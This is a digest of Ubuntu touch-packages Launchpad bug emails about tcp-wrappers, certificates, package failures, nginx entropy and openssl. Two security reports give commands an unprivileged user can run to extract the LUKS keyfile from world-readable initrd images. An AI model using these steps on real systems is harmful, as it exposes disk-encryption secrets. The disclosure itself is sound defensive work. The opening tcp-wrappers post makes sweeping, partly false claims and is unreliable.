is no way to perform a security check on her/him. Many companies use them 
nevertheless because of the low cost. I know a company that hires North Korean 
engineers working out of mainland China. They log in for legitimate purposes to 
American corporate servers. They actually live in North Korea and are forced to 
back home every 3 weeks. They only have access to dynamic IP addresses, where a 
PTR record does not exist, thus, no reverse-hostname is possible. As a fact: no 
dynamic IP address has a corresponding PTR record.
  The question is how to whitelist a remote worker’s IP automatically. This 
issue cannot be easily solved since commercial VPNs do not guarantee that the 
same IP will be offered on the next connection. Many small companies that hire 
foreign workers end up creating fence servers, but that is exponentially more 
insecure since now you have a potential hacker sitting comfortably inside your 
firewall, behind your line of defense. Your network may have access to other 
companies networks, all the way up to a power station or a government facility, 
maybe a nuclear facility. A very somber scenario.
  Since Libwrap is the ultimate defense to keep hackers from controlling your 
servers, it should ONLY verify if an incoming connection resolves to a domain 
listed in /etc/hosts.allow. It does not. Prior, it performs a hostname check 
that invariably fails unless the pair IP address/ domain exists in /etc/hosts, 
but of course that information changes sometimes hourly. As a result of this 
problem, you cannot use it as a gatekeeper for remote access from dynamic IP 
addresses, increasing your level of insecurity.
  As I said, I explained all these ideas to the author, Wietse, without 
success. He insisted that using a public key was how you protect servers. I 
disagree. Without Libwrap, which means IP whitelisting, a simple public key 
mechanism is suicidal. It is very easy to see why. In a first step, a hacker 
steals the pair public-private key from a box which has legitimate access to 
your network. Then he uses the pair in another box located in his country, from 
which he will access your network as if he were the legitimate client or 
worker. It happened to me already. Libwrap applied to a domain plus public key 
will perform infinitely better than a public key alone. In fact, public key 
alone should not be used at all. This is obvious since by using it, you are 
delegating your security to the box you are allowing to connect, so your entire 
network is now as secure as your client or worker’s home network, which you 
don’t control. You just opened the doors of your company wide-open.
  What I suggest is to modify Libwrap so a domain listed in /etc/hosts.allow 
would work for real, just performing a simple DNS lookup to will match the IP 
address to the domain. Right now, this is impossible.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/tcp-wrappers/+bug/1839598/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1838802] Re: ca-certificates missing trusted entry from linuxfoundation

[Seth Arnold]

Hello,

It appears the source.codeaurora.org site has not correctly configured
their TLS certificate chain:

https://www.ssllabs.com/ssltest/analyze.html?d=source.codeaurora.org

"Chain issues   Incomplete, Extra certs"

If you can contact the admins for this site, please ask them to include
all necessary intermediate certificates provided by their CA.

Thanks

** Changed in: ca-certificates (Ubuntu)
   Status: New => Invalid

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ca-certificates in Ubuntu.
https://bugs.launchpad.net/bugs/1838802

Title:
  ca-certificates missing trusted entry from linuxfoundation

Status in ca-certificates package in Ubuntu:
  Invalid

Bug description:
  source.codeaurora.org (linuxfoundation) changed their certificate on
  30 JUL 2019. When cloning from codeaurora, you now get this error:

  $ git clone https://source.codeaurora.org/external/imx/libdrm-imx.git/
  Cloning into 'libdrm-imx'...
  fatal: unable to access 
'https://source.codeaurora.org/external/imx/libdrm-imx.git/': server 
certificate verification failed. CAfile: /etc/ssl/certs/ca-certificates.crt 
CRLfile: none

  I think this suggests that the issuing CA Authority is not trusted and
  included in ca-certificates.crt. I've confirmed this certificate
  validation issue on both ubuntu 16.04 and ubutnu 18.04. I've even
  upgraded and reinstalled the ca-certificates package and still get the
  same validation error.

  I assumed it might be a problem with my clock out of sync, so I
  synchronized my server time with chrony and the issue persists. I can
  add the certificate manually to my installation of git and get around
  the issue, but I suspect that this issue will impact anyone attempting
  to clone from the linux foundation git servers.

  I've attached the source.codeaurora.org certificate to this bug
  report. The certificate shows that the issueing authority is "Sectigo
  RSA Domain Validation Secure Server CA"

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/ca-certificates/+bug/1838802/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1836335] Re: package base-files 9.4ubuntu4.9 failed to install/upgrade: subprocess installed post-installation script returned error exit status 127

[Seth Arnold]

*** This bug is a duplicate of bug 1836236 ***
https://bugs.launchpad.net/bugs/1836236

** Information type changed from Private Security to Public

** This bug has been marked a duplicate of bug 1836236
   9.4ubuntu4.9: Broken package because of missing "#" @ 
/var/lib/dpkg/info/base-files.postinst +131

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to base-files in Ubuntu.
https://bugs.launchpad.net/bugs/1836335

Title:
  package base-files 9.4ubuntu4.9 failed to install/upgrade: subprocess
  installed post-installation script returned error exit status 127

Status in base-files package in Ubuntu:
  New

Bug description:
  I don't know

  ProblemType: Package
  DistroRelease: Ubuntu 16.04
  Package: base-files 9.4ubuntu4.9
  ProcVersionSignature: Ubuntu 4.4.0-155.182-generic 4.4.181
  Uname: Linux 4.4.0-155-generic i686
  ApportVersion: 2.20.1-0ubuntu2.19
  Architecture: i386
  Date: Fri Jul 12 10:26:43 2019
  Dependencies:
   
  DuplicateSignature:
   package:base-files:9.4ubuntu4.9
   Setting up base-files (9.4ubuntu4.9) ...
   /var/lib/dpkg/info/base-files.postinst: 131: 
/var/lib/dpkg/info/base-files.postinst: Automatically: not found
   dpkg: error processing package base-files (--configure):
subprocess installed post-installation script returned error exit status 127
  ErrorMessage: subprocess installed post-installation script returned error 
exit status 127
  InstallationDate: Installed on 2011-11-14 (2796 days ago)
  InstallationMedia: Ubuntu 11.04 "Natty Narwhal" - Release i386 (20110427.1)
  RelatedPackageVersions:
   dpkg 1.18.4ubuntu1.5
   apt  1.2.32
  SourcePackage: base-files
  Title: package base-files 9.4ubuntu4.9 failed to install/upgrade: subprocess 
installed post-installation script returned error exit status 127
  UpgradeStatus: Upgraded to xenial on 2017-11-12 (606 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/base-files/+bug/1836335/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1835464] Re: nginx service fails after libssl update due to low entropy at boot

[Seth Arnold]

I read through Bionic's systemd-random-seed.service source (src/random-
seed/random-seed.c) and didn't see any references to RNDADDTOENTCNT or
RNDADDENTROPY, the ioctl(2)s that are used to indicate to the kernel
that added entropy should be used for the random(4) device. Maybe
they're hidden behind some abstraction layers, but if so, I didn't spot
them.

Does anyone know if this is intentional? Or what reasoning might have
lead to this decision?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1835464

Title:
  nginx service fails after libssl update due to low entropy at boot

Status in nginx package in Ubuntu:
  Opinion
Status in openssl package in Ubuntu:
  New
Status in nginx source package in Bionic:
  Opinion
Status in openssl source package in Bionic:
  New

Bug description:
  After updating libssl and related packages, nginx will no longer
  autostart at system boot.

  Immediately after boot, nginx.service is in a failed state.

  # service nginx status
  ● nginx.service - A high performance web server and a reverse proxy server
 Loaded: loaded (/lib/systemd/system/nginx.service; enabled; vendor preset: 
enabled)
 Active: failed (Result: timeout) since Fri 2018-08-24 21:27:51 UTC; 32min 
ago
   Docs: man:nginx(8)

  systemd[1]: Starting A high performance web server and a reverse proxy 
server...
  systemd[1]: nginx.service: Start-pre operation timed out. Terminating.
  systemd[1]: nginx.service: Failed with result 'timeout'.
  systemd[1]: Failed to start A high performance web server and a reverse proxy 
server.

  
  The service can be manually started after boot.

  # service nginx start
  # service nginx status
  ● nginx.service - A high performance web server and a reverse proxy server
 Loaded: loaded (/lib/systemd/system/nginx.service; enabled; vendor preset: 
enabled)
 Active: active (running) since Fri 2018-08-24 22:02:06 UTC; 2s ago
   Docs: man:nginx(8)
Process: 2704 ExecStart=/usr/sbin/nginx -g daemon on; master_process on; 
(code=exited, status=0/SUCCESS)
Process: 2703 ExecStartPre=/usr/sbin/nginx -t -q -g daemon on; 
master_process on; (code=exited, status=0/SUCCESS)
   Main PID: 2705 (nginx)
 CGroup: /system.slice/nginx.service
 ├─2705 nginx: master process /usr/sbin/nginx -g daemon on; 
master_process on;
 └─2706 nginx: worker process

  systemd[1]: Starting A high performance web server and a reverse proxy 
server...
  systemd[1]: nginx.service: Failed to parse PID from file /run/nginx.pid: 
Invalid argument
  systemd[1]: Started A high performance web server and a reverse proxy server.

  
  This happens on an ARMHF based microcontroller running ubuntu 18.04.2 raspi 
server distribution with a stock kernel.org 4.9-181 kernel.

  Ubuntu repositories are not accessible from the device, so packages
  are copied to the device, and apt install is used to upgrade them:

  apt install --no-install-recommends $dir/updates/system/*.deb  |
  logger 2>&1

  
  The following is a list of packages that, when upgraded, cause the nginx 
systemd service to fail to autostart at boot.

  201,205c201,205
  < ii  libpython2.7:armhf  2.7.15-4ubuntu4~18.04 armhf 
   Shared Python runtime library (version 2.7)
  < ii  libpython2.7-minimal:armhf  2.7.15-4ubuntu4~18.04 armhf 
   Minimal subset of the Python language (version 2.7)
  < ii  libpython2.7-stdlib:armhf   2.7.15-4ubuntu4~18.04 armhf 
   Interactive high-level object-oriented language (standard library, 
version 2.7)
  < ii  libpython3.6-minimal:armhf  3.6.8-1~18.04.1   armhf 
   Minimal subset of the Python language (version 3.6)
  < ii  libpython3.6-stdlib:armhf   3.6.8-1~18.04.1   armhf 
   Interactive high-level object-oriented language (standard library, 
version 3.6)
  ---
  > ii  libpython2.7:armhf  2.7.15~rc1-1ubuntu0.1 armhf 
   Shared Python runtime library (version 2.7)
  > ii  libpython2.7-minimal:armhf  2.7.15~rc1-1ubuntu0.1 armhf 
   Minimal subset of the Python language (version 2.7)
  > ii  libpython2.7-stdlib:armhf   2.7.15~rc1-1ubuntu0.1 armhf 
   Interactive high-level object-oriented language (standard library, 
version 2.7)
  > ii  libpython3.6-minimal:armhf  3.6.7-1~18.04 armhf 
   Minimal subset of the Python language (version 3.6)
  > ii  libpython3.6-stdlib:armhf   3.6.7-1~18.04 armhf 
   Interactive high-level object-oriented language (standard library, 
version 3.6)
  225c225
  < ii  libssl1.1:armhf 1.1.1-1ubuntu2.1~18.04.2  armhf 
   Secure Sockets Layer toolkit - shared libraries
  ---
  > ii  libssl1.1:armhf 1.1.0g-2ubuntu4.3 armhf 
  

[Touch-packages] [Bug 1820203] Re: [MIR] libpgm as dependency of mailman3

[Seth Arnold]

** Changed in: libpgm (Ubuntu)
 Assignee: Ubuntu Security Team (ubuntu-security) => (unassigned)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libpgm in Ubuntu.
https://bugs.launchpad.net/bugs/1820203

Title:
  [MIR] libpgm as dependency of mailman3

Status in libpgm package in Ubuntu:
  New

Bug description:
  [Availability]
  The package is already universe for quite a while and build/works fine so far.
  It is for example already used for 
https://lists.canonical.com/mailman3/postorius/lists/
  OTOH it is a library that can/could be used for much more than just the 
mailman3 stack.

  It builds on all architectures (arch:any)

  [Security]

  No known CVEs found.
  The protocol had some issues a few years ago and related issues in 
Cisco/Microsoft products, but I found no open issues in the package.
  => https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=pgm

  [Quality assurance]

  As part of the mailman3 stacks as of now (Disco) this installs fine and works 
fine.
  On itself it is useful to (many) other dependencies and does not need a post 
install configuration on its own.

  The package does not ask debconf questions.

  One known bug in each of Ubuntu and Debian.
  - The Ubunut bug is outdated and should be ok with 5.2 which we have.
  - The Debian bug is only important for solaris builds
  Upstream has 16 open and 27 closed issues - nothing very severe for our 
intentions.

  The package seems get updates by Debian as needed.
  But upstream seems to have stopped releasing after 2012.
  => https://github.com/steve-o/openpgm/releases
  After talking with one of the uploaders it became clear that they still work 
on master and fixes can be pulled from there as needed.
  https://github.com/steve-o/openpgm/commits/master

  No exotic HW involved.

  There are some tests in ./openpgm/pgm/test/ and ./openpgm/pgm/*_unittest.c 
but dh_auto_test isn't catching them.
  OTOH I can't even guarantee they would be usable, but TL;DR no build time 
tests run.

  d/watch is set up and ok.

  gNo Lintian warning except newer Standards/Compat versions and no
  HTTPS links uses or GPG checks - nothing severe.

  The package does not rely on demoted or obsolete packages.
  The Scons build system is a pain, but it seems to work as packaged by Debian 
so no complains.
  No new gt2k dependencies
  As mentioned the package itself might be abandoned/orphaned by upstream

  [UI standards]

  It uses i18n from gi18n-lib to provide the infrastructure, but I found no 
translations so far.
  But that is ok as this is a low level library without (a lot) of user visible 
strings - no translations (needed).
  No End-user applications that needs a standard conformant desktop file.

  [Dependencies]

  Some dependencies are not in main, but we drive MIR for all related packages
  that are not in main at the same time.
  Please check the list of bugs from the main Mailman3 MIR in bug 1775427 to 
get an overview.

  [Standards compliance]
  The package meets the FHS and Debian Policy standards.
  The packaging itself is very straight forward and uses dh_* as much as 
possible - the d/rules fits on one screen.

  [Maintenance]

  The Server team will subscribe for the package for maintenance, but in
  general it seems low on updates and currently is a sync from Debian.

  [Background]
  The package description explains the general purpose and context of the 
package well.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libpgm/+bug/1820203/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1835095] Re: Lubuntu initrd images leaking cryptographic secret when disk encryption is used

[Seth Arnold]

** Also affects: lubuntu-meta (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to initramfs-tools in Ubuntu.
https://bugs.launchpad.net/bugs/1835095

Title:
  Lubuntu initrd images leaking cryptographic secret when disk
  encryption is used

Status in initramfs-tools package in Ubuntu:
  Confirmed
Status in lubuntu-meta package in Ubuntu:
  New

Bug description:
  Hello!

  I've had a short discussion about this issue on lubuntu irc, and I was
  asked to open a bug report. Basically I only tested this on lubuntu
  19.04 x64 live image on a UEFI system, I haven't tested other ubuntu
  flavors.

  Anyway, I was poking around with disk encryption, and I noticed that
  lubuntu live image uses a graphical installation tool called
  Calamares. This tool has an option to encrypt the hard disk during
  installation, and the encryption setup that is used is the newer one
  with /boot folder as part of the encrypted rootfs. Traditionally the
  installers used to setup encryption where there is a main LUKS-
  encrypted rootfs volume on the HDD and a separate unencrypted /boot
  partition where the grub config files, the kernel and the initrd
  images reside. Ever since grub2 added support for LUKS several distros
  have apparently moved to the newer scheme which is very similar to the
  one that was first described by Pavel Kogan in his blog.

  A) https://www.pavelkogan.com/2014/05/23/luks-full-disk-encryption/
  B) https://www.pavelkogan.com/2015/01/25/linux-mint-encryption/

  
  This new scheme stores the rootfs (including the /boot folder) on a single 
LUKS-encrypted partition with two keyslots in use. One of the keyslots is 
normally a passphrase that is used in the first stage by the grub2 EFI image as 
pre-boot authentication. It serves to decrypt the rootfs, access the contents 
of /boot and copy the config, kernel and initrd image to RAM. Once done, grub2 
then forgets the passphrase and closes the encrypted volume. The system will 
continue to boot, but at this point the rootfs will now have to be decrypted a 
second time - this time by the kernel/initrd so it can be mounted. Normally 
this is the point where the user would be asked to enter a passphrase for the 
second time, but for convenience reasons (to automate the process) a second 
LUKS keyslot and a keyfile are used instead.

  The file /crypto_keyfile.bin is generated during the installation
  phase. This is the secret keyfile that is used to unlock the other
  LUKS keyslot and decrypt the rootfs. It is properly protected with
  owner set to root:root and file permissions 600 (-rw---).
  Unfortunately the key is not of much use while it resides inside the
  encrypted volume that it is supposed to decrypt. This is where
  initramfs-tools comes into play. I believe there is a special hook
  inside /usr/share/initramfs-tools/hooks that is responsible for
  copying this crypto_keyfile.bin file into appropriate initrd image.
  This image that now contains the secret keyfile is copied into RAM
  during the first decryption stage by the grub2.

  
  While the original secret keyfile /crypto_keyfile.bin is protected:

  $ ls -l /
  ...
  -rw---  1 root root  2048 jul 2 18:34  crypto_keyfile.bin
  ...
  $ sha1sum /crypto_keyfile.bin
  sha1sum: /crypto_keyfille.bin: Permission denied
  $ sudo sha1sum /crypto_keyfile.bin
  7a1c44fd036510cc02e32c094bd16b4a76a7f14c  /crypto_keyfile.bin

  The second copy (the one inside initramfs image) is not:

  $ ls -l /boot
  ...
  -rw-r--r--  1 root root 68149041 jul  2 18:35 initrd.img-5.0.0-13-generic

  As you can see, the initramfs images that are generated by mkinitramfs
  will have the user:group set to root:root, but their access flags will
  be 644 (-rw-r--r--). This means that any user or even a script that
  has read access to the file system can read and extract the secret
  keyfile from an initramfs image.

  Run as user:
  $ unmkinitramfs /boot/initrd.img-5.0.0-13-generic /tmp
  $ sha1sum /tmp/main/crypto_keyfile.bin
  7a1c44fd036510cc02e32c094bd16b4a76a7f14c  /tmp/main/crypto_keyfile.bin

  
  Would there be any adverse effects, if we were to set mkinitramfs (i.e. via a 
hook) to always set file permissions of initramfs images to 600 whenever this 
type of disk encryption is used?

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/initramfs-tools/+bug/1835095/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1835096] Re: Unprivileged user can access LUKS keyfile

[Seth Arnold]

*** This bug is a duplicate of bug 1835095 ***
https://bugs.launchpad.net/bugs/1835095

** Information type changed from Private Security to Public Security

** This bug has been marked a duplicate of bug 1835095
   Lubuntu initrd images leaking cryptographic secret when disk encryption is 
used

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to initramfs-tools in Ubuntu.
https://bugs.launchpad.net/bugs/1835096

Title:
  Unprivileged user can access LUKS keyfile

Status in initramfs-tools package in Ubuntu:
  New
Status in lubuntu-meta package in Ubuntu:
  New

Bug description:
  Lubuntu 19.04 and newer uses Calamares as installer. During the
  installation, the user can choose to encrypt the entire disk (Full
  Disk Encryption FDE). Calamares creates an LUKS container (and an EFI-
  System-Partition, when needed).

  When booting, Grub asks for the passphrase to unlock the LUKS
  container. For convenience, there is the keyfile "/crypto_keyfile.bin"
  (600, root:root) which will be used later to unlock the LUKS container
  again.

  An unprivileged user can't copy or read the keyfile. But the keyfile
  is also in the initrd.img.

  Attack:
  Even an unprivileged user has read-access to the initrd.img under /boot, so 
the attacker can execute:
  (1) $ unmkinitramfs /boot/initrd.img-5.0.0.20-generic /tmp/initrd
  (2) $ cp /tmp/initrd/main/crypto_keyfile.bin ~

  DREAD (LOW = 1, MEDIUM = 2, HIGH = 3):
  Damage: HIGH => This attack allows to get the keyfile
  Reproducibility: HIGH => Works every time with access to the system
  Exploitability: LOW/MEDIUM => You must have access to a shell and the 
unencrypted device (maybe in combination with another vulnerability)
  Affected users: MEDIUM => Every user which uses Lubuntu 19.04 and newer in 
combination with FDE, maybe also other users
  Discoverability: HIGH => The origin of this bug report is publicly logged: 
https://irclogs.ubuntu.com/2019/07/02/%23lubuntu.html#t10:26

  DREAD-Rating: 12/13 of 15

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/initramfs-tools/+bug/1835096/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1495302] Re: subprocess installed post-installation script returned error exit status 10

[Seth Arnold]

*** This bug is a duplicate of bug 1832919 ***
https://bugs.launchpad.net/bugs/1832919

** This bug has been marked a duplicate of bug 1832919
   installed libssl1.1:amd64 package post-installation script subprocess 
returned error exit status 10

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1495302

Title:
  subprocess installed post-installation script returned error exit
  status 10

Status in openssl package in Ubuntu:
  Triaged

Bug description:
  Upgrading to wily

  $ sudo dpkg --configure libssl1.0.0   

  Setting up libssl1.0.0:amd64 (1.0.2d-0ubuntu1) ...
  Checking for services that may need to be restarted...done.
  Checking for services that may need to be restarted...done.
  Checking init scripts...
  dpkg: error processing package libssl1.0.0:amd64 (--configure):
   subprocess installed post-installation script returned error exit status 10
  Errors were encountered while processing:
   libssl1.0.0:amd64

  ProblemType: Bug
  DistroRelease: Ubuntu 15.10
  Package: libssl1.0.0 1.0.2d-0ubuntu1
  ProcVersionSignature: Ubuntu 3.19.0-27.29-generic 3.19.8-ckt5
  Uname: Linux 3.19.0-27-generic x86_64
  ApportVersion: 2.17.2-0ubuntu1.4
  Architecture: amd64
  CurrentDesktop: Unity
  Date: Sun Sep 13 23:22:19 2015
  InstallationDate: Installed on 2015-04-19 (147 days ago)
  InstallationMedia: Ubuntu 15.04 "Vivid Vervet" - Beta amd64 (20150417.1)
  SourcePackage: openssl
  UpgradeStatus: Upgraded to wily on 2015-09-13 (0 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1495302/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1509011] Re: package libssl1.0.0 1.0.2d-0ubuntu1 failed to install/upgrade: 14.4828:subprocess installed post-installation script returned error exit status 10

[Seth Arnold]

*** This bug is a duplicate of bug 1832919 ***
https://bugs.launchpad.net/bugs/1832919

** This bug is no longer a duplicate of bug 1495302
   subprocess installed post-installation script returned error exit status 10
** This bug has been marked a duplicate of bug 1832919
   installed libssl1.1:amd64 package post-installation script subprocess 
returned error exit status 10

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1509011

Title:
  package libssl1.0.0 1.0.2d-0ubuntu1 failed to install/upgrade:
  14.4828:subprocess installed post-installation script returned error
  exit status 10

Status in openssl package in Ubuntu:
  Invalid

Bug description:
  Dependency problem after upgrading from 15.04 to 15.10

  ProblemType: Package
  DistroRelease: Ubuntu 15.10
  Package: libssl1.0.0 1.0.2d-0ubuntu1
  ProcVersionSignature: Ubuntu 3.19.0-31.36-generic 3.19.8-ckt7
  Uname: Linux 3.19.0-31-generic x86_64
  ApportVersion: 2.17.2-0ubuntu1.5
  Architecture: amd64
  Date: Thu Oct 22 18:18:44 2015
  DuplicateSignature: package:libssl1.0.0:1.0.2d-0ubuntu1:14.4828:subprocess 
installed post-installation script returned error exit status 10
  ErrorMessage: 14.4828:subprocess installed post-installation script returned 
error exit status 10
  InstallationDate: Installed on 2015-02-02 (262 days ago)
  InstallationMedia: Ubuntu 14.04.1 LTS "Trusty Tahr" - Release amd64 
(20140722.2)
  RelatedPackageVersions:
   dpkg 1.18.2ubuntu5
   apt  1.0.10.2ubuntu1
  SourcePackage: openssl
  Title: package libssl1.0.0 1.0.2d-0ubuntu1 failed to install/upgrade: 
14.4828:subprocess installed post-installation script returned error exit 
status 10
  UpgradeStatus: Upgraded to wily on 2015-10-22 (0 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1509011/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1510185] Re: package python3 3.4.3-1 failed to install/upgrade: pre-dependency problem - not installing python3

[Seth Arnold]

*** This bug is a duplicate of bug 1832919 ***
https://bugs.launchpad.net/bugs/1832919

** This bug is no longer a duplicate of bug 1495302
   subprocess installed post-installation script returned error exit status 10
** This bug has been marked a duplicate of bug 1832919
   installed libssl1.1:amd64 package post-installation script subprocess 
returned error exit status 10

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1510185

Title:
  package python3 3.4.3-1 failed to install/upgrade: pre-dependency
  problem - not installing python3

Status in openssl package in Ubuntu:
  Confirmed

Bug description:
  Upgrading to Ububtu 15.10.

  ProblemType: Package
  DistroRelease: Ubuntu 15.10
  Package: python3
  ProcVersionSignature: Ubuntu 3.19.0-21.21-generic 3.19.8
  Uname: Linux 3.19.0-21-generic x86_64
  ApportVersion: 2.19.1-0ubuntu3
  Architecture: amd64
  Date: Mon Oct 26 10:17:33 2015
  DuplicateSignature: package:python3:3.4.3-1:pre-dependency problem - not 
installing python3
  ErrorMessage: pre-dependency problem - not installing python3
  InstallationDate: Installed on 2015-06-11 (137 days ago)
  InstallationMedia: Ubuntu 15.04 "Vivid Vervet" - Release amd64 (20150422)
  RelatedPackageVersions:
   dpkg 1.18.2ubuntu5
   apt  1.0.10.2ubuntu1
  SourcePackage: python3-defaults
  Title: package python3 3.4.3-1 failed to install/upgrade: pre-dependency 
problem - not installing python3
  UpgradeStatus: Upgraded to wily on 2015-10-26 (0 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1510185/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1832421] Re: openssl reboot needed message using incorrect path to X server

[Seth Arnold]

I'm not sure how to do SRU verification on this update. I don't know a
set of steps to take to see the update notification when running X11.
Upgrading and downgrading among several packages did NOT show the update
notification:

sarnold@hunt:/tmp$ sudo dpkg -i 
~/Downloads/libssl1.1_1.1.1-1ubuntu2.1~18.04.1_amd64.deb 
(Reading database ... 293979 files and directories currently installed.)
Preparing to unpack .../libssl1.1_1.1.1-1ubuntu2.1~18.04.1_amd64.deb ...
Unpacking libssl1.1:amd64 (1.1.1-1ubuntu2.1~18.04.1) over 
(1.1.1-1ubuntu2.1~18.04.1) ...
Setting up libssl1.1:amd64 (1.1.1-1ubuntu2.1~18.04.1) ...
Processing triggers for libc-bin (2.27-3ubuntu1) ...
sarnold@hunt:/tmp$ sudo apt-get install libssl1.1=1.1.1-1ubuntu2.1~18.04.2
Reading package lists... Done
Building dependency tree   
Reading state information... Done
The following packages were automatically installed and are no longer required:
  linux-headers-4.15.0-48 linux-headers-4.15.0-48-generic 
linux-image-4.15.0-48-generic
  linux-modules-4.15.0-48-generic linux-modules-extra-4.15.0-48-generic 
linux-tools-4.15.0-48
  linux-tools-4.15.0-48-generic
Use 'sudo apt autoremove' to remove them.
The following packages will be upgraded:
  libssl1.1
1 upgraded, 0 newly installed, 0 to remove and 73 not upgraded.
Need to get 0 B/1,295 kB of archives.
After this operation, 0 B of additional disk space will be used.
Preconfiguring packages ...
(Reading database ... 293979 files and directories currently installed.)
Preparing to unpack .../libssl1.1_1.1.1-1ubuntu2.1~18.04.2_amd64.deb ...
Unpacking libssl1.1:amd64 (1.1.1-1ubuntu2.1~18.04.2) over 
(1.1.1-1ubuntu2.1~18.04.1) ...
Processing triggers for libc-bin (2.27-3ubuntu1) ...
Setting up libssl1.1:amd64 (1.1.1-1ubuntu2.1~18.04.2) ...
Checking for services that may need to be restarted...done.
Checking for services that may need to be restarted...done.
Checking init scripts...

Restarting services possibly affected by the upgrade:

Services restarted successfully.

Processing triggers for libc-bin (2.27-3ubuntu1) ...
sarnold@hunt:/tmp$ sudo apt-get install libssl1.1=1.1.1-1ubuntu2.1~18.04.3
Reading package lists... Done
Building dependency tree   
Reading state information... Done
The following packages were automatically installed and are no longer required:
  linux-headers-4.15.0-48 linux-headers-4.15.0-48-generic 
linux-image-4.15.0-48-generic
  linux-modules-4.15.0-48-generic linux-modules-extra-4.15.0-48-generic 
linux-tools-4.15.0-48
  linux-tools-4.15.0-48-generic
Use 'sudo apt autoremove' to remove them.
The following packages will be upgraded:
  libssl1.1
1 upgraded, 0 newly installed, 0 to remove and 73 not upgraded.
Need to get 0 B/1,295 kB of archives.
After this operation, 4,096 B of additional disk space will be used.
Preconfiguring packages ...
(Reading database ... 293979 files and directories currently installed.)
Preparing to unpack .../libssl1.1_1.1.1-1ubuntu2.1~18.04.3_amd64.deb ...
Unpacking libssl1.1:amd64 (1.1.1-1ubuntu2.1~18.04.3) over 
(1.1.1-1ubuntu2.1~18.04.2) ...
Processing triggers for libc-bin (2.27-3ubuntu1) ...
Setting up libssl1.1:amd64 (1.1.1-1ubuntu2.1~18.04.3) ...
Processing triggers for libc-bin (2.27-3ubuntu1) ...

I'm going to mark this verification-done-bionic, because the notifier
didn't show on my desktop system. Feel free to revert if you know a good
way to see the notification on a desktop when it shouldn't have been
visible.

Thanks

** Tags removed: verification-needed-bionic
** Tags added: verification-done-bionic

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1832421

Title:
  openssl reboot needed message using incorrect path to X server

Status in openssl package in Ubuntu:
  Fix Committed
Status in openssl source package in Bionic:
  Fix Committed
Status in openssl source package in Cosmic:
  Fix Committed
Status in openssl source package in Disco:
  Fix Committed
Status in openssl source package in Eoan:
  Fix Committed

Bug description:
  [Impact]

   * On desktop, upgrading libssl1.1 does not show reboot required
  notification

  [Test Case]

   * Boot ubuntu desktop
   * Upgrade libssl1.1
   * Observe reboot notification pop-up from update-notifier is _not_ shown

  [Regression Potential]

   * Tweaking postinst only to correct for the Xorg path. Current code
  is innert, but is well excercised in prior releases.

  [Other Info]

   * Original bug report:

  Hello, the openssl library postinst file is using pidof /usr/bin/X,
  but that doesn't appear to be the path to the X11 server any more:

  debian/libssl1.1.postinst:

  # Only issue the reboot notification for servers; we proxy this by
  # testing that the X server is not running (LP: #244250)
